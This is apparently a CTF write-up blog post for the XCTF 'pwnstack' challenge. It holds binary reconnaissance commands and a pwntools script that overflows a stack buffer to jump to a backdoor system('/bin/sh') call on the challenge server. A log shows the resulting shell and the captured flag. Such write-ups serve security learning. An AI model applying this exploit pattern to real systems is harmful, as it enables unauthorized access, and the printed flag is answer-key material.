pwnstack-攻防世界

最新推荐文章于 2024-03-31 21:53:12 发布

32进制

最新推荐文章于 2024-03-31 21:53:12 发布

阅读量538

点赞数

分类专栏： ctf 攻防世界CTF 笔记文章标签： ubuntu linux 服务器

本文链接：https://blog.csdn.net/m0_47210241/article/details/129901365

版权

ctf 同时被 3 个专栏收录

23 篇文章 1 订阅

订阅专栏

攻防世界CTF

23 篇文章 0 订阅

订阅专栏

笔记

19 篇文章 0 订阅

订阅专栏

pwnstack-攻防世界

.text:0000000000400762

giantbranch@ubuntu:~/Desktop$ file pwn2
pwn2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62aa40d64871e142a32827b4e403772e72f67fba, not stripped

giantbranch@ubuntu:~/Desktop$ file pwn2
pwn2: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=62aa40d64871e142a32827b4e403772e72f67fba, not stripped
giantbranch@ubuntu:~/Desktop$ checksec pwn2
[*] '/home/giantbranch/Desktop/pwn2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
giantbranch@ubuntu:~/Desktop$ strings pwn2 | grep sh
/bin/sh
.shstrtab
.gnu.hash
giantbranch@ubuntu:~/Desktop$ objdump -d pwn2 | grep system
0000000000400570 <system@plt>:
  400770:	e8 fb fd ff ff       	callq  400570 <system@plt>
giantbranch@ubuntu:~/Desktop$ objdump -d pwn2 | grep backdoor
0000000000400762 <backdoor>:
giantbranch@ubuntu:~/Desktop$ cat pwn2poc1.py 
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',62376)
#61.147.171.105 62376
pad=168

pause()

ret_addr=0x0000000000400762
payload=b'A'*pad+p64(ret_addr)

delimiter='that??'

io.sendlineafter(delimiter,payload)
io.interactive()


giantbranch@ubuntu:~/Desktop$ ROPgadget 
2756a327-40e8-4093-8108-2720515d77c4.zip
2f5d364e-1703-4bee-a03b-1513b914e351.zip
666
8deb5f0c2cd84143807b6175f58d6f3f.core
CatFly
e179a07987bb468e8b084a556612c4fc.zip
.gdb_history
peda-session-666.txt
peda-session-CatFly.txt
peda-session-pwn2.txt
pwn2
pwn2poc1.py
.pwn2poc2.py.swp
xuexipwn1/
giantbranch@ubuntu:~/Desktop$ ROPgadget --binary pwn2 --only "pop|ret"|grep rdi
0x0000000000400813 : pop rdi ; ret
giantbranch@ubuntu:~/Desktop$

giantbranch@ubuntu:~/Desktop$ python2 pwn2poc1.py 
[+] Opening connection to 61.147.171.105 on port 62376: Done
[*] Paused (press any to continue)
[DEBUG] Received 0x1f bytes:
    'this is pwn1,can you do that??\n'
[DEBUG] Sent 0xb1 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    000000a0  41 41 41 41  41 41 41 41  62 07 40 00  00 00 00 00  │AAAA│AAAA│b·@·│····│
    000000b0  0a                                                  │·│
    000000b1
[*] Switching to interactive mode

$ id
[DEBUG] Sent 0x3 bytes:
    'id\n'
[DEBUG] Received 0xc bytes:
    '/bin/sh: 1: '
/bin/sh: 1: [DEBUG] Received 0xe bytes:
    'id: not found\n'
id: not found
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'cyberpeace{6c9e27e4cd6f2716234d85e2585562b9}\n'
cyberpeace{6c9e27e4cd6f2716234d85e2585562b9}
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ 
[DEBUG] Sent 0x1 bytes:
    '\n' * 0x1
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x22 bytes:
    'bin\n'
    'dev\n'
    'flag\n'
    'lib\n'
    'lib32\n'
    'lib64\n'
    'pwn2\n'
bin
dev
flag
lib
lib32
lib64
pwn2
$ 
[*] Interrupted
[*] Closed connection to 61.147.171.105 port 62376

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',62376)
#61.147.171.105 62376
pad=168

pause()

ret_addr=0x0000000000400762
payload=b'A'*pad+p64(ret_addr)

delimiter='that??'

io.sendlineafter(delimiter,payload)
io.interactive()